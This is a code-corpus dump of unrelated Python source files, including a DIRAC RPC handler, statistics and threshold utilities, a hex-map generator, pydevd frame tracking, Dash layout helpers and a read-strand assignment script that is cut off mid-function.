    response = app.test_client().get('/test_route', headers={'X-SessionId': 'foo'})
    # Validate ConsistentRead setting
    assert 'ConsistentRead=True' in str(boto_mock_instance.get_item.call_args)
| 2.09375 | 2 |
reference/apps.py | tanyong8520/tushare | 0 | 12769703 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ReferenceConfig(AppConfig):
    """Django application configuration for the ``reference`` app."""
    name = 'reference'
| 1.101563 | 1 |
ResourceStatusSystem/Service/ResourceManagementIHEPHandler.py | zhangxt-ihep/IHEPDIRAC | 0 | 12769704 | <filename>ResourceStatusSystem/Service/ResourceManagementIHEPHandler.py
''' ResourceManagementHandler
Module that allows users to access the ResourceManagementDB remotely.
'''
from DIRAC import gConfig, S_OK, gLogger
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.ResourceStatusSystem.Utilities import Synchronizer, Utils
from IHEPDIRAC.ResourceStatusSystem.DB.ResourceManagementIHEPDB import ResourceManagementIHEPDB
__RCSID__ = '$Id: $'
def initializeResourceManagementIHEPHandler( _serviceInfo ):
  '''
    Handler initialization, where we set the ResourceManagementDB as global db.
  '''
  global db
  db = ResourceManagementIHEPDB()

  # Regenerates DB tables if needed
  db._checkTable()

  # Re-run the RSS synchronizer whenever a new CS configuration is published.
  syncObject = Synchronizer.Synchronizer()
  gConfig.addListenerToNewVersionEvent( syncObject.sync )

  return S_OK()
################################################################################
class ResourceManagementIHEPHandler( RequestHandler ):
  '''
    Exposes the ResourceManagementIHEPDB front-end over DISET XML-RPC.

    Only the generic primitives (insert, update, select, delete, addOrModify,
    addIfNotThere) are exported; anything more elaborate belongs in the
    client or in the DB class. Access this service through
    ResourceManagementClient rather than calling the RPC layer directly:

    >>> from DIRAC.Core.DISET.RPCClient import RPCCLient
    >>> server = RPCCLient("ResourceStatus/ResourceManagement")
  '''

  def __init__( self, *args, **kwargs ):
    super( ResourceManagementIHEPHandler, self ).__init__( *args, **kwargs )

  @staticmethod
  def __logResult( methodName, result ):
    '''
      Log the error message of a failed S_ERROR result.
    '''
    if not result[ 'OK' ]:
      gLogger.error( '%s%s' % ( methodName, result[ 'Message' ] ) )

  @staticmethod
  def setDatabase( database ):
    '''
      Let subclasses/tests overwrite the module-level database object
      without touching the global directly.

      :Parameters:
        **database** - `MySQL`
          database used by this handler

      :return: None
    '''
    global db
    db = database

  types_insert = [ dict, dict ]
  def export_insert( self, params, meta ):
    '''
      Thin bridge to ResourceManagementDB.insert; no extra processing or
      validation is added here.

      :Parameters:
        **params** - `dict`
          arguments for the mysql query ( must match table columns ! ).
        **meta** - `dict`
          metadata for the mysql query; must contain at least a `table` key.

      :return: S_OK() || S_ERROR()
    '''
    gLogger.info( 'insert: %s %s' % ( params, meta ) )
    res = db.insert( params, meta )
    self.__logResult( 'insert', res )
    return res

  types_update = [ dict, dict ]
  def export_update( self, params, meta ):
    '''
      Thin bridge to ResourceManagementDB.update; same contract as insert.

      :return: S_OK() || S_ERROR()
    '''
    gLogger.info( 'update: %s %s' % ( params, meta ) )
    res = db.update( params, meta )
    self.__logResult( 'update', res )
    return res

  types_select = [ dict, dict ]
  def export_select( self, params, meta ):
    '''
      Thin bridge to ResourceManagementDB.select; same contract as insert.

      :return: S_OK() || S_ERROR()
    '''
    gLogger.info( 'select: %s %s' % ( params, meta ) )
    res = db.select( params, meta )
    self.__logResult( 'select', res )
    return res

  types_delete = [ dict, dict ]
  def export_delete( self, params, meta ):
    '''
      Thin bridge to ResourceManagementDB.delete; same contract as insert.

      :return: S_OK() || S_ERROR()
    '''
    gLogger.info( 'delete: %s %s' % ( params, meta ) )
    res = db.delete( params, meta )
    self.__logResult( 'delete', res )
    return res

  types_addOrModify = [ dict, dict ]
  def export_addOrModify( self, params, meta ):
    '''
      Thin bridge to ResourceManagementDB.addOrModify; same contract as insert.

      :return: S_OK() || S_ERROR()
    '''
    gLogger.info( 'addOrModify: %s %s' % ( params, meta ) )
    res = db.addOrModify( params, meta )
    self.__logResult( 'addOrModify', res )
    return res

  types_addIfNotThere = [ dict, dict ]
  def export_addIfNotThere( self, params, meta ):
    '''
      Thin bridge to ResourceManagementDB.addIfNotThere; same contract as insert.

      :return: S_OK() || S_ERROR()
    '''
    gLogger.info( 'addIfNotThere: %s %s' % ( params, meta ) )
    res = db.addIfNotThere( params, meta )
    self.__logResult( 'addIfNotThere', res )
    return res
################################################################################
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
| 2.203125 | 2 |
kinbot/jobs.py | rubenvdvijver/KinBot | 0 | 12769705 | ###################################################
## ##
## This file is part of the KinBot code v2.0 ##
## ##
## The contents are covered by the terms of the ##
## BSD 3-clause license included in the LICENSE ##
## file, found at the root. ##
## ##
## Copyright 2018 National Technology & ##
## Engineering Solutions of Sandia, LLC (NTESS). ##
## Under the terms of Contract DE-NA0003525 with ##
## NTESS, the U.S. Government retains certain ##
## rights to this software. ##
## ##
## Authors: ##
## <NAME> ##
## <NAME> ##
## ##
###################################################
"""
Class to keep track fo the jobs and their id's
"""
# keys: job names
# values: job PBS id
# Module-level registry shared by the scheduling code: maps each submitted
# job's name to the PBS id it was assigned.
job_ids = {}
| 1.125 | 1 |
test/test_add.py | mcraig2/uplink | 0 | 12769706 | import os
import sys
import unittest
sys.path.insert(0, os.path.abspath('..'))
from uplink.add_entry import add_entry
class TestAddEntry(unittest.TestCase):
    """Placeholder tests for uplink.add_entry.

    NOTE(review): test_one_one only checks arithmetic and never calls the
    imported add_entry; a real test of add_entry still needs to be written.
    """

    def test_one_one(self):
        self.assertEqual(1 + 1, 2)
if __name__ == '__main__':
unittest.main()
| 2.25 | 2 |
pycles/pycles.py | matthewkovacs/pycles | 0 | 12769707 | """
PyCLES
Desc: This is an implementation of the Common Language Effect Size (CLES) in Python
Author: <NAME>
Date: 04/05/20
"""
import numpy as np
from scipy.stats import norm
def nonparametric_cles(a, b, half_credit=True) -> float:
    """Brute-force common language effect size.

    Estimates the probability that a value drawn at random from ``a``
    exceeds a value drawn at random from ``b`` by scoring every pairwise
    comparison: a win counts 1, a loss 0, and a tie counts 0.5 when
    ``half_credit`` is enabled (otherwise 0).

    e.g.
    nonparametric_cles([0, 1], [0, 0], True)  >> 0.75
    nonparametric_cles([0, 1], [0, 0], False) >> 0.5
    nonparametric_cles([1, 1], [0, 0])        >> 1.0
    nonparametric_cles([0, 0], [1, 1])        >> 0.0
    """
    # Pairwise outcome matrix: +1 where a_i > b_j, -1 where smaller, 0 on ties.
    outcomes = np.sign(np.subtract.outer(a, b))
    if half_credit:
        outcomes = np.where(outcomes == 0, 0.5, outcomes)
    # Losses (and, without half credit, ties) contribute nothing to the score.
    outcomes = np.where(outcomes == -1, 0, outcomes)
    return np.mean(outcomes)
def parametric_cles(a, b):
    """Parametric (normal-theory) common language effect size.

    Assuming the data are normally distributed, returns P(X > Y) for
    X ~ N(mean(a), std(a)^2) and Y ~ N(mean(b), std(b)^2) drawn
    independently, via the normal CDF (McGraw & Wong, 1992):
    CL = Phi((mean(a) - mean(b)) / sqrt(std(a)^2 + std(b)^2)).
    """
    ma, mb = np.mean(a), np.mean(b)
    # Bug fix: the pooled scale must be built from the standard deviations
    # of the two samples; the old code squared the *means* instead.
    # np.std uses the population convention (ddof=0).
    sd = np.sqrt(np.std(a) ** 2 + np.std(b) ** 2)
    if sd == 0:
        # Both samples are constant: the comparison is deterministic.
        return 1.0 if ma > mb else (0.0 if ma < mb else 0.5)
    return norm.cdf(x=0, loc=mb - ma, scale=sd)
| 3.390625 | 3 |
tests/test_importers.py | zweifisch/klar | 1 | 12769708 | import klar
class TestImporters:
    """Tests for klar's custom import hooks (templates and JSON schemas)."""

    def test_template_import(self):
        # klar's import hook makes templates.index directly callable with a
        # render context -- presumably returning the rendered HTML; TODO confirm.
        import templates.index
        expected = "<html><i>html</i></html>\n"
        assert templates.index({'html': '<i>html</i>'}) == expected

    def test_json_import(self):
        # schemas.product is loaded from a JSON file by klar's import hook.
        from schemas import product
        assert product['type'] == 'object'
| 2.421875 | 2 |
hex.py | funkaoshi/hexenbracken | 17 | 12769709 | <reponame>funkaoshi/hexenbracken<gh_stars>10-100
import argparse
import csv
import os
import re
import string
import sys
import jinja2
import hexmap as hm
# ---- Command-line handling and data loading -------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--format', dest='fmt', default='html',
                    help="Format of output: html or text")
parser.add_argument('CSV', help="The CSV file with the hex descriptions.")
parser.add_argument('Title', help="The title of this hex map.")
args = parser.parse_args(sys.argv[1:])

# Pick the template that matches the requested output format.
if args.fmt == 'html':
    template_name = os.path.basename(args.CSV)[:-3] + 'html'
elif args.fmt == 'text':
    template_name = 'text.txt'
# NOTE(review): any other -f value besides 'stats' (handled below) leaves
# template_name undefined and will crash later at env.get_template().

# Read CSV dump of Google Docs hex map descriptions and create hexmap of
# the data.
with open(args.CSV) as csvfile:
    hexmap = hm.HexMap(csv.reader(csvfile))

# 'stats' mode only prints the summary histograms and exits.
if args.fmt == 'stats':
    print('Most referenced Hexes:')
    for l, count in hexmap.reference_histogram[-10:]:
        print("\t%s mentioned %d times" % (l, count))
    print('Themes found in hexes:')
    for l, count in hexmap.themes_histogram:
        print("\t%s mentioned %d times" % (l, count))
    exit(0)
# Output Data to Template
def settlementlink(m):
    """re.sub callback: turn a [[settlement]] match into an HTML anchor.

    Uses the module-level ``hexmap``; unknown settlements come back as
    their plain upper-cased name.
    """
    # Look up settlement in settlement map and create link if the settlement
    # exists.
    settlement = m.group(1).upper().strip()
    if settlement in hexmap.settlements:
        return "<a href='#{hex}' class='city-link'>{settlement}</a>".format(
            settlement=settlement, hex=hexmap.settlements[settlement])
    return settlement
def hex2link(text):
    """Expand [[...]] markers: 4-digit hex numbers and settlement names
    become anchors in HTML mode, plain text otherwise."""
    # Add links were appropriate
    if args.fmt == 'html':
        text = re.sub(r"\[\[(\d\d\d\d)\]\]",
                      r"<a class='hex-link' href='#\1'>\1</a>",
                      text)
        text = re.sub(r"\[\[(.*?)\]\]", settlementlink, text)
    else:
        # Convert link short-hand to plain text.
        text = re.sub(r"\[\[(.*?)\]\]", r"\1", text)
    return text
def getreferences(h):
    """Return a comma-joined list of anchor links to hexes referencing *h*."""
    # return references for this hex.
    if h in hexmap.references:
        return ', '.join("<a class='hex-link' href='#%s'>%s</a>" % (l, l)
                         for l in sorted(hexmap.references[h]))
    return ''
def coordinates(location):
    """Split a 4-digit hex label like "0512" into integer (column, row)."""
    column, row = location[:2], location[2:]
    return int(column), int(row)
# Map bounds derived from the highest-numbered hex label (e.g. "2436").
last_hex = sorted(hexmap.hexes.keys())[-1]
max_x, max_y = coordinates(last_hex)
def nw(location):
    """Label of the north-west neighbour of *location*, or '' off-map."""
    x, y = coordinates(location)
    # Odd columns sit half a row lower, so their NW neighbour is one row up.
    ny = y - 1 if x % 2 == 1 else y
    nx = x - 1
    if nx <= 0 or ny <= 0:
        return ''
    return "%02d%02d" % (nx, ny)
def ne(location):
    """Label of the north-east neighbour of *location*, or '' off-map."""
    x, y = coordinates(location)
    # Odd columns sit half a row lower, so their NE neighbour is one row up.
    ny = y - 1 if x % 2 == 1 else y
    nx = x + 1
    if nx >= max_x or ny <= 0:
        return ''
    return "%02d%02d" % (nx, ny)
def se(location):
    """Label of the south-east neighbour of *location*, or '' off-map."""
    x, y = coordinates(location)
    # Even columns sit half a row higher, so their SE neighbour is one row down.
    ny = y + 1 if x % 2 == 0 else y
    nx = x + 1
    if nx >= max_x or ny >= max_y:
        return ''
    return "%02d%02d" % (nx, ny)
def sw(location):
    """Label of the south-west neighbour of *location*, or '' off-map.

    Mirrors se(): in this offset layout odd columns are shifted down
    (nw()/ne() step up a row only for odd x), so the two southern
    diagonal neighbours move one row down only for EVEN columns.
    The original tested ``x % 2 == 1`` here, which disagreed with se()
    and returned the wrong hex for half of the columns.
    """
    x, y = coordinates(location)
    if x % 2 == 0:  # was ``== 1``: must match the parity test used in se()
        y += 1
    x -= 1
    return '' if x <= 0 or y >= max_y else "%02d%02d" % (x, y)
def process(description):
    """Normalise a hex description: punctuation, capitalisation, links.

    Returns '' for blank descriptions — the original indexed into the
    stripped string unconditionally and raised IndexError on empty
    CSV cells.
    """
    description = description.strip()
    if not description:
        return ''
    # Make sure the sentence ends with punctuation.
    if description[-1] not in string.punctuation:
        description = description + '.'
    # Make sure the sentence starts with a capital letter.
    if description[0].islower():
        description = description.capitalize()
    return hex2link(description)
# Register the filters used by the templates, then render to stdout.
env = jinja2.Environment(loader=jinja2.FileSystemLoader('templates'))
env.filters['process'] = process
env.filters['references'] = getreferences
env.filters['nw'] = nw
env.filters['ne'] = ne
env.filters['sw'] = sw
env.filters['se'] = se
template = env.get_template(template_name)
# Template context: sorted hexes, author credit line, cross references, title.
context = {
    'hexes': sorted(hexmap.hexes.items()),
    'authors': ", ".join("%s (%s)" % (author, count)
                         for author, count in hexmap.author_histogram.most_common()),
    'references': hexmap.references,
    'title': args.Title
}
print(template.render(**context))
| 3.125 | 3 |
setup.py | house-of-vanity/homebank-wui | 0 | 12769710 | #!/usr/bin/env python
# Fall back to a stub Changelog when python-debian is unavailable so the
# package can still be built outside a Debian build environment.
try:
    from debian.changelog import Changelog
except ImportError:
    class Changelog(object):
        def __init__(self, _):
            pass
        def get_version(self):
            # Placeholder version used when the real changelog parser is missing.
            return '0.0.0'
from os import environ
from os.path import abspath, dirname, join
from setuptools import setup, find_packages
here = abspath(dirname(__file__))
changelog = join(here, 'debian/changelog')
# Runtime and development requirements live in plain text files next to setup.py.
requirements = open(join(here, 'requires.txt')).readlines()
dev_requirements = open(join(here, 'dev_requires.txt')).readlines()
additional = {}
# debhelper setup FAKEROOTKEY variable
if 'FAKEROOTKEY' not in environ:
    # Not inside a Debian package build: register the console entry point
    # and also install the development requirements.
    additional['entry_points'] = {'console_scripts': [
        'homebank-web = homebank.cli:manage'
    ]}
    requirements.extend(dev_requirements)
setup(
    name='homebank-wui',
    # Version is taken from the Debian changelog (or '0.0.0' via the stub).
    version=str(Changelog(open(changelog)).get_version()),
    description='Web User Interface for Homebank',
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/rembish/homebank-wui',
    packages=find_packages(),
    include_package_data=True,
    data_files=[
        ('/usr/share/homebank/', ['data/sample.xhb']),
    ],
    zip_safe=False,
    install_requires=requirements,
    **additional)
| 1.929688 | 2 |
packages/eclipse/plugins/org.python.pydev_4.4.0.201510052309/pysrc/pydevd_custom_frames.py | liangazhou/django-rdp | 0 | 12769711 | from pydevd_constants import * #@UnusedWildImport
from pydevd_file_utils import GetFilenameAndBase
from _pydev_imps import _pydev_thread
threadingCurrentThread = threading.currentThread
DEBUG = False
#=======================================================================================================================
# CustomFramesContainer
#=======================================================================================================================
class CustomFramesContainer:
    # Plain namespace holder; all attributes are attached (and re-attached
    # after a fork) by CustomFramesContainerInit().
    pass
def CustomFramesContainerInit(): #Note: no staticmethod on jython 2.1 (so, use free-function)
    # Lock guarding every access to CustomFramesContainer state below.
    CustomFramesContainer.custom_frames_lock = _pydev_thread.allocate_lock()
    # custom_frames can only be accessed if properly locked with custom_frames_lock!
    # Key is a string identifying the frame (as well as the thread it belongs to).
    # Value is a CustomFrame.
    #
    CustomFramesContainer.custom_frames = {}
    # Only to be used in this module
    CustomFramesContainer._next_frame_id = 0
    # This is the event we must set to release an internal process events. It's later set by the actual debugger
    # when we do create the debugger.
    CustomFramesContainer._py_db_command_thread_event = Null()
#Initialize it the first time (it may be reinitialized later on when dealing with a fork).
CustomFramesContainerInit()
#=======================================================================================================================
# CustomFrame
#=======================================================================================================================
class CustomFrame:
    """Record describing one custom frame shown in the debugger."""

    def __init__(self, name, frame, thread_id):
        self.name = name            # display string for the frame
        self.frame = frame          # the actual frame object to show
        self.mod_time = 0           # bumped every time the frame is updated
        self.thread_id = thread_id  # id of the thread the frame belongs to
def addCustomFrame(frame, name, thread_id):
    """Register *frame* under *name*/*thread_id* and return its frame id.

    Thread-safe: all container state is mutated under custom_frames_lock.
    """
    CustomFramesContainer.custom_frames_lock.acquire()
    try:
        curr_thread_id = GetThreadId(threadingCurrentThread())
        next_id = CustomFramesContainer._next_frame_id = CustomFramesContainer._next_frame_id + 1
        # Note: the frame id kept contains an id and thread information on the thread where the frame was added
        # so that later on we can check if the frame is from the current thread by doing frame_id.endswith('|'+thread_id).
        frame_id = '__frame__:%s|%s' % (next_id, curr_thread_id)
        if DEBUG:
            sys.stderr.write('addCustomFrame: %s (%s) %s %s\n' % (
                frame_id, GetFilenameAndBase(frame)[1], frame.f_lineno, frame.f_code.co_name))
        CustomFramesContainer.custom_frames[frame_id] = CustomFrame(name, frame, thread_id)
        # Wake the debugger command thread so it notices the new frame.
        CustomFramesContainer._py_db_command_thread_event.set()
        return frame_id
    finally:
        CustomFramesContainer.custom_frames_lock.release()
def updateCustomFrame(frame_id, frame, thread_id, name=None):
    """Update the thread (and optionally name) of an existing custom frame.

    Bumps mod_time so clients can detect the change; an unknown *frame_id*
    is logged rather than raised.
    NOTE(review): the *frame* argument is accepted but unused here.
    """
    CustomFramesContainer.custom_frames_lock.acquire()
    try:
        if DEBUG:
            sys.stderr.write('updateCustomFrame: %s\n' % frame_id)
        try:
            old = CustomFramesContainer.custom_frames[frame_id]
            if name is not None:
                old.name = name
            old.mod_time += 1
            old.thread_id = thread_id
        except:
            sys.stderr.write('Unable to get frame to replace: %s\n' % (frame_id,))
            import traceback;traceback.print_exc()
        CustomFramesContainer._py_db_command_thread_event.set()
    finally:
        CustomFramesContainer.custom_frames_lock.release()
def getCustomFrame(thread_id, frame_id):
    '''
    :param thread_id: This should actually be the frame_id which is returned by addCustomFrame.
    :param frame_id: This is the actual id() of the frame
    '''
    # Returns the matching frame object, or None (implicitly) if no frame
    # in the chain has the requested id().
    CustomFramesContainer.custom_frames_lock.acquire()
    try:
        frame_id = int(frame_id)
        f = CustomFramesContainer.custom_frames[thread_id].frame
        # Walk the f_back chain looking for the frame whose id() matches.
        while f is not None:
            if id(f) == frame_id:
                return f
            f = f.f_back
    finally:
        # Drop the local frame reference to avoid keeping a reference cycle alive.
        f = None
        CustomFramesContainer.custom_frames_lock.release()
def removeCustomFrame(frame_id):
    """Unregister *frame_id*; a no-op if it is not registered."""
    CustomFramesContainer.custom_frames_lock.acquire()
    try:
        if DEBUG:
            sys.stderr.write('removeCustomFrame: %s\n' % frame_id)
        DictPop(CustomFramesContainer.custom_frames, frame_id, None)
        # Wake the debugger command thread so it notices the removal.
        CustomFramesContainer._py_db_command_thread_event.set()
    finally:
        CustomFramesContainer.custom_frames_lock.release()
| 1.796875 | 2 |
one_more_layer_of_stacking/src/sf_utils.py | guitarmind/HPA-competition-solutions | 0 | 12769712 | <reponame>guitarmind/HPA-competition-solutions
import numpy as np
import pandas as pd
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.utils import shuffle
import matplotlib.pyplot as plt
plt.style.use('seaborn-white')
import seaborn as sns
sns.set_style("white")
from skimage.transform import resize
from skimage.color import rgb2gray, gray2rgb
from sklearn.metrics import f1_score, precision_score, recall_score, roc_auc_score
from tqdm import tqdm_notebook
import gc
import math
import sys
from fastai import *
from fastai.vision import *
# Fix the NumPy RNG so fold splits are reproducible across runs.
np.random.seed(42)
# Project directory layout (relative to this file).
data_dir = '../../../input/'
submit_l1_dir = "../../../submits/"
weights_dir = "../../weights/"
results_dir = '../../../results/'
# Human Protein Atlas class index -> organelle/structure name (28 classes).
name_label_dict = {
    0: 'Nucleoplasm',
    1: 'Nuclear membrane',
    2: 'Nucleoli',
    3: 'Nucleoli fibrillar center',
    4: 'Nuclear speckles',
    5: 'Nuclear bodies',
    6: 'Endoplasmic reticulum',
    7: 'Golgi apparatus',
    8: 'Peroxisomes',
    9: 'Endosomes',
    10: 'Lysosomes',
    11: 'Intermediate filaments',
    12: 'Actin filaments',
    13: 'Focal adhesion sites',
    14: 'Microtubules',
    15: 'Microtubule ends',
    16: 'Cytokinetic bridge',
    17: 'Mitotic spindle',
    18: 'Microtubule organizing center',
    19: 'Centrosome',
    20: 'Lipid droplets',
    21: 'Plasma membrane',
    22: 'Cell junctions',
    23: 'Mitochondria',
    24: 'Aggresome',
    25: 'Cytosol',
    26: 'Cytoplasmic bodies',
    27: 'Rods & rings' }
def _best_threshold(y_true, y_pred):
    """Grid-search 50 thresholds spanning [min(y_pred), max(y_pred)] and
    return the one maximising the F1 score against *y_true*."""
    thresholds = np.linspace(np.min(y_pred), np.max(y_pred), 50)
    scores = np.array([
        f1_score(y_true, np.int32(y_pred >= threshold))
        for threshold in thresholds
    ])
    return thresholds[np.argmax(scores)]


def kfold_threshold(y_true, y_pred):
    """Per-class decision thresholds for multi-label predictions.

    For classes with more than 20 positive samples the threshold is the
    mean of the per-fold best thresholds from a 5-fold stratified split
    (more robust to sampling noise); rare classes fall back to a single
    search over all samples.  The duplicated linspace/argmax search of
    the original is factored into _best_threshold().

    Args:
        y_true: (n_samples, n_classes) binary ground-truth matrix.
        y_pred: (n_samples, n_classes) predicted scores.
    Returns:
        (classes_thresholds, classes_scores): per-class threshold and the
        F1 obtained with it, both lists of length n_classes.
    """
    n_classes = len(name_label_dict)
    classes_thresholds = []
    classes_scores = []
    kf = StratifiedKFold(n_splits=5, shuffle=True, random_state=239)
    for i in range(n_classes):
        if sum(y_true[:, i]) > 20:
            fold_thresholds = [
                _best_threshold(y_true[tst_inx, i], y_pred[tst_inx, i])
                for _, tst_inx in kf.split(y_true, y_true[:, i])
            ]
            threshold = np.mean(fold_thresholds)
        else:
            threshold = _best_threshold(y_true[:, i], y_pred[:, i])
        classes_thresholds.append(threshold)
        classes_scores.append(
            f1_score(y_true[:, i], np.int32(y_pred[:, i] >= threshold)))
    return classes_thresholds, classes_scores
layout_instructions.py | Susanne-ICDS/gsd-designer | 0 | 12769713 | <filename>layout_instructions.py
import dash_html_components as html
import dash_bootstrap_components as dbc
# Column spacing used across the app (Bootstrap 12-column grid units).
spacing_variables = {'offset': 1, 'size': 10, 'int_input': 1, 'float_input': 2}
# House-style VUB blue used for headers and table headers.
vub_blue = '#003399'
# Bold label shorthand.
label = html.B
def my_jumbo_box(header, sub_header):
    """Full-width banner row: white header and sub-header on VUB-blue."""
    col_width = {'offset': spacing_variables['offset'],
                 'size': spacing_variables['size']}
    content = [
        html.Br(),
        html.H4(header, style={'color': 'white'}),
        html.Label(sub_header, style={'color': 'white'}),
        html.Br(),
        html.Label(' '),
    ]
    return dbc.Row(dbc.Col(width=col_width, children=content),
                   style={'background-color': vub_blue})
# Plain-text label shorthand.
regular_text = html.Label
# Shared DataTable styling: rounded container, blue header, white data rows.
table_style = {
    'css': [{'selector': '.dash-spreadsheet-container',
             'rule': 'border-radius: 6px; overflow: hidden;'}],
    'style_cell': {'fontSize': 16, 'font-family': 'sans-serif', 'text-align': 'left',
                   'padding': '12px'},
    'style_header': {'color': 'white', 'background-color': vub_blue},
    'style_data': {'color': '#343a40', 'background-color': 'white'}}
# Greyed-out variants for disabled tables.
disabled_style_header = {'color': '#E8E8E8', 'background-color': '#808080'}
disabled_style_data = {'background-color': '#E8E8E8', 'color': '#808080'}
src/rpds.py | hyubiglab/CAFE | 0 | 12769714 | <reponame>hyubiglab/CAFE
#!/share/apps/python/bin/python
import sys, os
import copy, math
import config as conf
import data as data
import module as module
import sam as sam
# RPDS configuration: inference type ('hmm' enables Markov scoring) and order.
type = conf.rpds_type
order = conf.rpds_order
# Positional arguments: genome assembly, unstranded BAM, stranded BAM,
# chromosome to process, and the output directory.
assembly = sys.argv[1]
unstranded = sys.argv[2]
stranded = sys.argv[3]
chr = sys.argv[4]
outputdir = sys.argv[5]
# matrix
if assembly == 'hg19': matrix_dir = data.hm_matrix
elif assembly == 'mm9': matrix_dir = data.ms_matrix
# Load the Markov transition matrices for orders 1..order.
# matrix_dic[order][strand][state_string] -> transition probability (as str).
matrix_dic = dict()
if type == 'hmm':
    for x in xrange(1, order+1):
        matrix_dic[x] = dict()
        matrix = open(matrix_dir + 'markov_' + str(x))
        for line in matrix:
            line = line.split(':')
            matrix_dic[x][line[0]] = dict()
            for y in xrange(1, 5):
                matrix_dic[x][line[0]][line[y].split("'")[1]] = line[y+1].split(',')[0].split('}')[0]
def rpds(unstranded, stranded, chr):
    """Assign strands to unstranded reads of one chromosome.

    Uses nearby read counts from the stranded library (and, for
    type == 'hmm', Markov transition probabilities over chains of
    neighbouring stranded reads) to decide each unstranded read's
    strand.  Confidently-stranded reads are flag-corrected and written
    to *_<chr>c.sam; undecidable reads go to *_<chr>u.sam, with counts
    logged.  Python 2 only (xrange, has_key, dict.keys() indexing).
    """
    finalMappingReads_dic = dict(); remainMappingReads_dic = dict(); npExonJunctionPairs_dic = dict()
    npMappingReads_dic, npExonJunctionReads_dic, npReadPos_dic = module.getBamDict(unstranded, chr)
    spReadPos_dic = module.getBamDictPos(stranded, chr, 'fr')
    npReadPos = sorted(npReadPos_dic.keys()); spReadPos = sorted(spReadPos_dic.keys()); index = 0
    # Pass 1: annotate each unstranded position with forward/reverse counts
    # of nearby stranded reads (and HMM probabilities when enabled).
    for npPos in npReadPos: #unstranded read position
        forwardReads = 0; reverseReads = 0; forwardRead = 0; reverseRead = 0
        if len(spReadPos[max(0, index):]) > 0:
            posList, distance = module.getAdjacentPos2(npPos, spReadPos[max(0, index):])
            if int(distance) <= 50: ##
                for i in range(len(posList)):
                    if len(spReadPos_dic[posList[i]]) > 1: #both strand
                        forwardRead = len(spReadPos_dic[posList[i]]['+']); reverseRead = len(spReadPos_dic[posList[i]]['-'])
                    else:
                        if spReadPos_dic[posList[i]].keys()[0] == '+':
                            forwardRead = len(spReadPos_dic[posList[i]]['+']); reverseRead = 0
                        else: #spReadPos_dic[posList[i]].keys()[0] == '-':
                            forwardRead = 0; reverseRead = len(spReadPos_dic[posList[i]]['-'])
                    forwardReads += forwardRead; reverseReads += reverseRead
                # Rewind the stranded search window slightly for the next position.
                index = spReadPos.index(posList[0]) - 10
        fProb = 1; rProb = 1
        if type == 'hmm':
            # Multiply transition probabilities along chains of up to
            # 'order' neighbouring stranded reads, for both strands.
            if len(spReadPos[max(0, index):]) > 0:
                apReads_dict = module.getAdjacentPos(npPos, spReadPos[max(0, index):])
                apReads_list = apReads_dict.keys(); apReads_list.sort()
                sense_list = []; nsense_list = []
                if int(apReads_list[0]) <= 50: ##
                    snReads_dict = dict(); snReads_dict[0] = []
                    for snRead in apReads_dict[apReads_list[0]]: snReads_dict[0].append([snRead])
                    for x in xrange(1, order):
                        if len(spReadPos[max(0, index):]) > x and int(snReads_dict.keys()[0]) == x-1:
                            snReads_dict = module.getAdjacentPos4(snReads_dict, spReadPos[max(0, index):], x)
                    for snReads_pos in snReads_dict.values()[0]:
                        nsense_list2 = []
                        for snRead_pos in snReads_pos: nsense_list2 += [spReadPos_dic[snRead_pos].keys()]
                        nsense_list.append(nsense_list2)
                    for m in nsense_list:
                        nsense_list3 = []
                        for n in xrange(0, len(m)): nsense_list3 = module.return_sense(nsense_list3, m, n)
                        sense_list += nsense_list3
                    for sense in sense_list:
                        for j in xrange(0, len(sense)):
                            if j == 0:
                                fProb = float(fProb) * float(matrix_dic[j+1]['+']['+'+sense[j]])
                                rProb = float(rProb) * float(matrix_dic[j+1]['-']['-'+sense[j]])
                            else:
                                fProb = float(fProb) * float(matrix_dic[j+1]['+'][sense[j-1]+sense[j]])
                                rProb = float(rProb) * float(matrix_dic[j+1]['-'][sense[j-1]+sense[j]])
        # NOTE(review): 'distance' is only bound when stranded positions
        # remained in the window above; presumably that always holds — verify.
        for npPosReads in npReadPos_dic[npPos].keys():
            for npPosRead in npReadPos_dic[npPos][npPosReads]:
                if int(distance) <= 50: npPosRead.setreadRatio(forwardReads, reverseReads)
                else: npPosRead.setreadRatio(1, 1)
                if type == 'hmm': npPosRead.setreadProb(fProb, rProb)
    del npReadPos_dic, spReadPos_dic, npReadPos, spReadPos
    # Pass 2: reconcile strand evidence between properly paired mates.
    mediateMappingReads_dic = copy.deepcopy(npMappingReads_dic)
    for p in npMappingReads_dic.keys():
        readNum = len(npMappingReads_dic[p])
        if readNum > 1: #the mate is mapped
            matchpos_dic = dict()
            for m in range(len(npMappingReads_dic[p])):
                for n in range(len(npMappingReads_dic[p])):
                    if (m < n and m != n):
                        pairRead1 = npMappingReads_dic[p][m]; pairRead2 = npMappingReads_dic[p][n]
                        if pairRead1.pos() == pairRead2.pnext() and pairRead1.pnext() == pairRead2.pos():
                            # reconfirm: 1 = forward, -1 = reverse, 0 = undecided.
                            matchpos_dic[m] = ''; matchpos_dic[n] = ''; reconfirm = 0
                            if (float(pairRead1.readRatio()) == 1 and float(pairRead2.readRatio()) != 0) or (float(pairRead1.readRatio()) != 0 and float(pairRead2.readRatio()) == 1): reconfirm = 1
                            elif (float(pairRead1.readRatio()) == 0 and float(pairRead2.readRatio()) != 1) or (float(pairRead1.readRatio()) != 1 and float(pairRead2.readRatio()) == 0): reconfirm = -1
                            else:
                                if type == 'hmm':
                                    # Ratios inconclusive: fall back on HMM probabilities.
                                    if (pairRead1.readProb() == 1 and pairRead2.readProb() == 1): pass
                                    elif (pairRead1.readProb() == 1111 and pairRead2.readProb() != -1111) or (pairRead1.readProb() != -1111 and pairRead2.readProb() == 1111): reconfirm = 1
                                    elif (pairRead1.readProb() == -1111 and pairRead2.readProb() != 1111) or (pairRead1.readProb() != 1111 and pairRead2.readProb() == -1111): reconfirm = -1
                                    elif (pairRead1.readProb() >= 1 and pairRead2.readProb() > 1) or (pairRead1.readProb() > 1 and pairRead2.readProb() >= 1): reconfirm = 1
